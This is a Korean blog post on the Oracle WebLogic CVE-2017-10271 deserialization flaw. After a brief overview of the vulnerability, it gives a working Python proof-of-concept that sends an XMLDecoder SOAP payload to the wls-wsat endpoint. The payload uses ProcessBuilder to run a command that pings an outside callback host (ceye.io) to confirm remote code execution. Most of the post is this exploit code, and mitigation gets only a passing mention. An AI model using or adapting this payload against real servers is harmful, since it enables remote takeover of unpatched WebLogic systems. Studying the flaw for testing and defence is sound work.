반응형
Oracle WebLogic Server CVE-2017-10271 취약점 분석 및 테스트

1. 취약점 개요
CVE-2017-10271은 WebLogic의 WSAT 컴포넌트에서 발생한 역직렬화 취약점으로, SOAP 요청을 통해 원격 코드 실행이 가능한 심각한 보안 이슈입니다.
- 공개일: 2017년 10월
- CVSS 점수: 7.5 (High)
- 영향 버전: WebLogic 10.3.6 이하, 12.1.3 이하 등
2. Python으로 취약점 검증하기
외부 코드를 반입하지 않고 SOAP 요청을 직접 구성하여 WebLogic 서버에 테스트할 수 있습니다.
import requests
target_url = "http://<TARGET_IP>:<PORT>/wls-wsat/CoordinatorPortType"
payload = """<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>cmd</string></void>
<void index="1"><string>/c</string></void>
<void index="2"><string>ping yourdomain.ceye.io</string></void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
"""
headers = { "Content-Type": "text/xml" }
response = requests.post(target_url, data=payload, headers=headers)
print("Status Code:", response.status_code)
print("Response:", response.text)
대응방안도 연구해 봐야할 것 같습니다.
반응형
'갑을병정이야기' 카테고리의 다른 글
| 하청 개발자와 불법파견: 법적 쟁점과 대응 전략 ( 미국에서 발생한 사태를 바라보며 ) (0) | 2025.09.18 |
|---|---|
| Java로 RESTful API 구현하기: Retrofit2, OkHttp3, Gson 활용 (0) | 2025.09.16 |
| DevExtreme DxDataGrid 셀에 버튼 추가하기 (1) | 2025.09.12 |
| Oracle 인덱스 정리: 실전 예제와 설계 팁 (0) | 2025.09.10 |
| Java에서 ScheduledExecutorService로 비동기 지연 처리하기 (0) | 2025.08.21 |